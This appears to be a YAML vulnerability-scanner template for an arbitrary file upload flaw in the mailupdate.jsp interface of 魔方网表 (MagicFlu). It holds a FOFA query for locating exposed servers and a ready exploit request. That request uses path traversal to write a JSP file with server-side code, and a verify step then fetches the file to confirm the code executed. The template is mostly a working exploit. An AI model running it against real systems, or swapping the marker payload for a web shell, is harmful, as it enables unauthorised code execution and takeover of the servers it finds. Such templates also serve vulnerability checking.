product: 魔方网表
vName: 魔方网表 mailupdate.jsp接口任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 魔方网表帮助其搭建了支持信创环境的端到端的一站式数据智能填报系统,实现数据收集模板个性化定义,收集任务集中管控,结构化数据存储、分析及呈现等功能。魔方网表mailupdate.jsp接口存在任意文件上传漏洞
version: ''
note: ''
search:
  FOFA: icon_hash="694014318"
protocol: http
link: https://mp.weixin.qq.com/s/YkEkQ9LI2xY2QDwyl7RpTQ
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /magicflu/html/mail/mailupdate.jsp?messageid=/../../../52e039302a62d077.jsp&messagecontent=%3C%25%20out.println%28%2295cc64dd2825f9df13ec4ad683ecf339%22%29%3B%25%3E
    verify:
      path: /magicflu/52e039302a62d077.jsp
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and